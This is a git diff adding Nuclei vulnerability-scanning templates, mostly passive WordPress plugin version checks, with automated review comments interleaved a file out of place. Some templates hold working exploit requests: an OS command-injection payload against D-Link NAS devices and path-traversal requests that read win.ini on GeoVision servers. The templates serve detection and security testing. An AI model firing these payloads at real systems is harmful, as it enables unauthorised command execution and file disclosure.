"wp-content/plugins/elementor/" + google-query: inurl:"/wp-content/plugins/elementor/" + shodan-query: 'vuln:CVE-2024-8236' + tags: cve,wordpress,wp-plugin,elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.25.7') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml b/poc/cve/CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml new file mode 100644 index 0000000000..a9aa82fb15 --- /dev/null +++ b/poc/cve/CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e + +info: + name: > + Jeg Elementor Kit <= 2.6.9 - Authenticated (Contributor+) Sensitive Information Exposure via sg_content_template + author: topscoder + severity: low + description: > + The Jeg Elementor Kit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.9 via the render_content function in class/elements/views/class-tabs-view.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4efc9c47-321a-4635-943f-785ffc34d851?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8899 + metadata: + fofa-query: "wp-content/plugins/jeg-elementor-kit/" + google-query: inurl:"/wp-content/plugins/jeg-elementor-kit/" + shodan-query: 'vuln:CVE-2024-8899' + tags: cve,wordpress,wp-plugin,jeg-elementor-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jeg-elementor-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jeg-elementor-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162.yaml b/poc/cve/CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162.yaml new file mode 100644 index 0000000000..3b3b842854 --- /dev/null 
+++ b/poc/cve/CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162 + +info: + name: > + Booster for WooCommerce <= 7.2.3 - Authenticated (ShopManager+) Stored Cross-Site Scripting via wcj_product_meta Shortcode + author: topscoder + severity: low + description: > + The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wcj_product_meta shortcode in all versions up to, and including, 7.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with ShopManager-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0abf9705-2716-403f-9348-e43a8d8fb1d2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-9170 + metadata: + fofa-query: "wp-content/plugins/woocommerce-jetpack/" + google-query: inurl:"/wp-content/plugins/woocommerce-jetpack/" + shodan-query: 'vuln:CVE-2024-9170' + tags: cve,wordpress,wp-plugin,woocommerce-jetpack,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-jetpack/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-jetpack" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.2.3') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml b/poc/cve/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml new file mode 100644 index 0000000000..100cc6f1bb --- /dev/null +++ b/poc/cve/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9307-99143edb3a824cd072b593997866abef + +info: + name: > + mFolio Lite <= 1.2.1 - Missing Authorization to Authenticated (Author+) File Upload via EXE and SVG Files + author: topscoder + severity: low + description: > + The mFolio Lite plugin for WordPress is vulnerable to file uploads due to a missing capability check in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file or upload arbitrary EXE files on the affected site's server which may make remote code execution possible if the attacker can also gain access to run the .exe file, or trick a site visitor into downloading and running the .exe file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b4012dd-7c0a-45f1-8ada-8f9dc6867e1e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-9307 + metadata: + fofa-query: "wp-content/plugins/mfolio-lite/" + google-query: inurl:"/wp-content/plugins/mfolio-lite/" + shodan-query: 'vuln:CVE-2024-9307' + tags: cve,wordpress,wp-plugin,mfolio-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mfolio-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mfolio-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9.yaml b/poc/cve/CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9.yaml new file mode 100644 index 0000000000..b3bb7ce0a6 --- /dev/null +++ b/poc/cve/CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9 + +info: + name: > + Total Upkeep <= 1.16.6 - Authenticated (Administrator+) Remote Code Execution via Backup Settings + author: topscoder + severity: low + description: > + The Total Upkeep – WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.16.6 via the cron_interval parameter. This is due to missing input validation and sanitization. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/804b42a0-1cea-4f68-bd4a-d292a9f23fbe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-9461 + metadata: + fofa-query: "wp-content/plugins/boldgrid-backup/" + google-query: inurl:"/wp-content/plugins/boldgrid-backup/" + shodan-query: 'vuln:CVE-2024-9461' + tags: cve,wordpress,wp-plugin,boldgrid-backup,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "boldgrid-backup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.16.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9504-029455c801fdee249681893f5eb0c87b.yaml b/poc/cve/CVE-2024-9504-029455c801fdee249681893f5eb0c87b.yaml new file mode 100644 index 0000000000..97389045b9 --- /dev/null 
+++ b/poc/cve/CVE-2024-9504-029455c801fdee249681893f5eb0c87b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9504-029455c801fdee249681893f5eb0c87b + +info: + name: > + Booking calendar, Appointment Booking System <= 3.2.15 - Unauthenticated Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: high + description: > + The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.2.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fb05281-205f-4d9c-aac9-2b37e069a6fb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-9504 + metadata: + fofa-query: "wp-content/plugins/booking-calendar/" + google-query: inurl:"/wp-content/plugins/booking-calendar/" + shodan-query: 'vuln:CVE-2024-9504' + tags: cve,wordpress,wp-plugin,booking-calendar,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.15') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9614-0ef94d7a238d24553757f1a16696672d.yaml b/poc/cve/CVE-2024-9614-0ef94d7a238d24553757f1a16696672d.yaml new file mode 100644 index 0000000000..71aff737b4 --- /dev/null +++ b/poc/cve/CVE-2024-9614-0ef94d7a238d24553757f1a16696672d.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9614-0ef94d7a238d24553757f1a16696672d + +info: + name: > + Constant Contact Forms by MailMunch <= 2.1.2 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Constant Contact Forms by MailMunch plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/92abab9e-904a-4a62-a911-a57baa9aa4af?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9614 + metadata: + fofa-query: "wp-content/plugins/constant-contact-forms-by-mailmunch/" + google-query: inurl:"/wp-content/plugins/constant-contact-forms-by-mailmunch/" + shodan-query: 'vuln:CVE-2024-9614' + tags: cve,wordpress,wp-plugin,constant-contact-forms-by-mailmunch,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/constant-contact-forms-by-mailmunch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "constant-contact-forms-by-mailmunch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9988-287bf623a719e14be52f61193b77398b.yaml b/poc/cve/CVE-2024-9988-287bf623a719e14be52f61193b77398b.yaml new file mode 100644 index 0000000000..fd2cbbe968 --- /dev/null +++ b/poc/cve/CVE-2024-9988-287bf623a719e14be52f61193b77398b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9988-287bf623a719e14be52f61193b77398b + +info: + name: > + Crypto <= 2.19 - Authentication Bypass via register + author: topscoder + severity: critical + description: > + The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.19. This is due to missing validation on the user being supplied in the 'crypto_connect_ajax_process::register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7bfe87cf-9883-4f8f-a0f5-23bbc7bb9b7c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9988 + metadata: + fofa-query: "wp-content/plugins/crypto/" + google-query: inurl:"/wp-content/plugins/crypto/" + shodan-query: 'vuln:CVE-2024-9988' + tags: cve,wordpress,wp-plugin,crypto,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/crypto/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "crypto" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.19') \ No newline at end of file 
diff --git a/poc/debug/aspx-debug-mode.yaml b/poc/debug/aspx-debug-mode.yaml
index 50a5ae5cbd..9b15bb6341 100644
--- a/poc/debug/aspx-debug-mode.yaml
+++ b/poc/debug/aspx-debug-mode.yaml
@@ -6,9 +6,11 @@ info:
severity: info
reference:
- https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled
- tags: debug
+ metadata:
+ max-request: 1
+ tags: debug,misconfig

-requests:
+http:
- raw:
- |
DEBUG /Foobar-debug.aspx HTTP/1.1
@@ -22,11 +24,15 @@ requests:
- type: status
status:
- 200
+
- type: word
words:
- 'OK'
part: body
+
- type: word
words:
- 'Content-Length: 2'
part: header
+
+# digest: 4a0a00473045022100e7a32aaa7cff08a4dddee13a653b02f87f89517cf5265e21898c31c6f96f25a90220098bf55aeaca69565900838b0a9ea62c3669bf923e3d1a0ec98c7e6db27b77de:922c64590222798bb761d5b6d8e72950
diff --git a/poc/header/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/header/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml
new file mode 100644
index 0000000000..a8cdba0344
--- /dev/null
+++ b/poc/header/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml
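Review bot: In the second hunk the word matcher `'Content-Length: 2'` with `part: header` is a substring test, so it is also satisfied by `Content-Length: 20`, `Content-Length: 2048` and any other length beginning with 2, and the body matcher `'OK'` is satisfied by any body that merely contains those two letters; together with `status: 200` this leaves the template more permissive than the "two-byte OK reply" it is clearly meant to detect. A regex matcher pins the intent without adding a request: `- type: regex`, `part: header`, `regex: ['(?mi)^content-length:\s*2\r?$']` in place of the Content-Length word matcher. The `matchers-condition` line that joins these matchers is above the hunk, so the combination is inferred; the added `max-request: 1` in the first hunk is consistent with the single raw request shown.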
@@ -0,0 +1,59 @@ +id: cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-header-footer-script-loader/" + google-query: inurl:"/wp-content/plugins/cm-header-footer-script-loader/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-header-footer-script-loader,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-header-footer-script-loader/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-header-footer-script-loader" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/injection/Command Injection.yaml b/poc/injection/Command Injection.yaml new file mode 100644 index 0000000000..d9bafbcde7 --- /dev/null +++ b/poc/injection/Command Injection.yaml 
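Review bot: `description: >` is followed by an empty block and `cvss-metrics:`, `cvss-score:`, `cve-id:` carry no value, so these keys load as null while `shodan-query: 'vuln:'` is an unusable query; either populate them from the referenced Wordfence record or drop the empty keys. With no CVE assigned, `cve` in `tags: cve,wordpress,wp-plugin,cm-header-footer-script-loader,medium` misleads anyone filtering by tag; `tags: wordpress,wp-plugin,cm-header-footer-script-loader,medium` is accurate. The name `Multiple Plugins <= (Various Versions)` also gives no version, while the `compare_versions(version, '<= 1.2.1')` check is specific to this slug, so the name should state the plugin and bound it actually tests. The same empty-field and tag pattern repeats in every api-scan template in this commit, at L141 through L157.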
@@ -0,0 +1,55 @@
+id: CVE-2024-10915
+
+info:
+ name: D-Link NAS - Command Injection via Group Parameter
+ author: s4e-io
+ severity: critical
+ description: |
+ A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been rated as critical. Affected by this issue is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument group leads to os command injection.
+ reference:
+ - https://www.usom.gov.tr/bildirim/tr-24-1836
+ - https://netsecfish.notion.site/Command-Injection-Vulnerability-in-group-parameter-for-D-Link-NAS-12d6b683e67c803fa1a0c0d236c9a4c5?pvs=4
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-10915
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-10915
+ cwe-id: CWE-78,CWE-707
+ epss-score: 0.0408
+ epss-percentile: 0.92375
+ cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: dlink
+ product: dns-320_firmware
+ shodan-query: http.html:"sharecenter"
+ fofa-query: body="sharecenter"
+ tags: cve,cve2024,dlink,sharecenter,rce
+
+http:
+ - raw:
+ - |
+ GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;{{command}};%27 HTTP/1.1
+ Host: {{Hostname}}
+
+ payloads:
+ command:
+ - "id"
+ - "ifconfig"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)"
+ - "contains_all(body, 'inet addr:', 'Mask:')"
+ condition: or
+
+ - type: dsl
+ dsl:
+ - 'contains(body, "Content-type: text/html")'
+ - "status_code == 200"
+ condition: and
+# digest: 4b0a00483046022100bbc4e26d910b3948b3e37bbd063882ae16a09988e6798da089e5bd006f1ff7ed022100ee3139d82637396d87421c0e84185377ae8f02bfdd6e4897ba7b6c9646708aaa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
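Review bot: In the first `dsl` matcher, the character class `[0-9(a-z)]` in `regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)` includes literal `(` and `)` as members, which is presumably unintended; `[0-9a-z]` expresses the intended class. The file is committed as `poc/injection/Command Injection.yaml` — a space in the path and no CVE in the name — while its `id` is `CVE-2024-10915` and the other CVE templates in this commit live under `poc/cve/CVE-*.yaml`, so `poc/cve/CVE-2024-10915.yaml` would be consistent and easier to tool against. A short comment above `http:` noting that this template sends an active command-execution payload and is not a passive version check would help operators decide where it is appropriate to run.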
diff --git a/poc/local_file_inclusion/geowebserver-lfi-xss.yaml b/poc/local_file_inclusion/geowebserver-lfi-xss.yaml
new file mode 100644
index 0000000000..181328a74d
--- /dev/null
+++ b/poc/local_file_inclusion/geowebserver-lfi-xss.yaml
@@ -0,0 +1,50 @@
+id: geovision-geowebserver-lfi-xss
+
+info:
+ name: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting
+ author: shamo0
+ severity: high
+ description: |
+ GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS, HTML Injection, and Local File Include (LFI) vectors. The application fails to properly sanitize user requests, allowing injection of HTML code and XSS, as well as client-side exploitation, including session theft.
+ reference:
+ - https://www.geovision.com.tw/cyber_security.php
+ - https://www.exploit-db.com/exploits/50211
+ metadata:
+ verified: true
+ max-request: 3
+ shodan-query: title:"Geowebserver"
+ tags: geovision,geowebserver,lfi,xss
+
+http:
+ - raw:
+ - |
+ GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /Visitor/bin/WebStrings.srf?obj_name=win.ini HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 0
+
+ - |
+ GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: or
+ matchers:
+ - type: dsl
+ name: lfi
+ dsl:
+ - 'contains_all(body, "for 16-bit", "[fonts]", "[extensions]")'
+ - 'contains(content_type, "application/octet-stream")'
+ - 'status_code == 200'
+ condition: and
+
+ - type: dsl
+ name: xss
+ dsl:
+ - 'contains_all(body, "={\"AeDebug")'
+ - 'contains(content_type, "text/html")'
+ - 'status_code == 200'
+ condition: and
+# digest: 4a0a00473045022073fb6629bd8a91705b1061035210bcd66d24136bb813085100ac437c95f8270f022100cb45f86cc14cf6cd92ce6bac43aa9e3e4c202a1df313a7489b1855c0cb36dfa5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
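Review bot: The matcher named `xss` does not check for script injection; it matches win.ini content (`={\"AeDebug`) returned with a `text/html` content type, i.e. the included file reflected into an HTML response, so the name and the `xss` tag overstate what the template confirms. Renaming it, e.g. `name: lfi-html`, and noting in a comment that no XSS payload is sent would keep the reported result honest. With `matchers-condition: or` and three raw requests, all three are always sent; `stop-at-first-match: true` next to `matchers-condition` would stop after the first confirming response.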
diff --git a/poc/other/apppresser-05523ca99a6812ce9a8ee1b96d42e704.yaml b/poc/other/apppresser-05523ca99a6812ce9a8ee1b96d42e704.yaml new file mode 100644 index 0000000000..2a41e54cd4 --- /dev/null +++ b/poc/other/apppresser-05523ca99a6812ce9a8ee1b96d42e704.yaml @@ -0,0 +1,59 @@ +id: apppresser-05523ca99a6812ce9a8ee1b96d42e704 + +info: + name: > + AppPresser – Mobile App Framework <= 4.4.6 - Unauthenticated Privilege Escalation via Password Reset + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/43cb0399-4add-43d5-863c-30e11803bd90?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/apppresser/" + google-query: inurl:"/wp-content/plugins/apppresser/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,apppresser,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/apppresser/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "apppresser" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.6') \ No newline at end of file diff --git a/poc/other/bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69.yaml b/poc/other/bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69.yaml new file mode 100644 index 0000000000..1c69b7dd19 --- /dev/null +++ b/poc/other/bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69.yaml 
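Review bot: `severity: low` is hard to reconcile with the name `AppPresser – Mobile App Framework <= 4.4.6 - Unauthenticated Privilege Escalation via Password Reset`, and with `cvss-score:` empty the template gives no basis for the rating. Unauthenticated privilege escalation normally rates critical, so the severity should be taken from the referenced Wordfence record rather than left at low; anyone filtering results by severity would otherwise skip this finding.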
@@ -0,0 +1,59 @@ +id: bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69 + +info: + name: > + BTEV <= Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/215be163-f362-4bda-b81a-65ec955968a2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bluetrait-event-viewer/" + google-query: inurl:"/wp-content/plugins/bluetrait-event-viewer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bluetrait-event-viewer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bluetrait-event-viewer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bluetrait-event-viewer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.2') \ No newline at end of file diff --git a/poc/other/booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb.yaml b/poc/other/booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb.yaml new file mode 100644 index 0000000000..92ce9edee5 --- /dev/null +++ b/poc/other/booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb.yaml 
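Review bot: The name `BTEV <= Cross-Site Request Forgery to Plugin Settings Update` is missing the version bound after `<=`, while the `dsl` matcher tests `compare_versions(version, '<= 2.0.2')`; `BTEV <= 2.0.2 - Cross-Site Request Forgery to Plugin Settings Update` states what the template actually checks.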
@@ -0,0 +1,59 @@ +id: booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb + +info: + name: > + Booking calendar, Appointment Booking System <= 3.2.15 - Unauthenticated Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fb05281-205f-4d9c-aac9-2b37e069a6fb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/booking-calendar/" + google-query: inurl:"/wp-content/plugins/booking-calendar/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,booking-calendar,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.15') \ No newline at end of file diff --git a/poc/other/cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml b/poc/other/cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml new file mode 100644 index 0000000000..d55177271c --- /dev/null +++ b/poc/other/cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml 
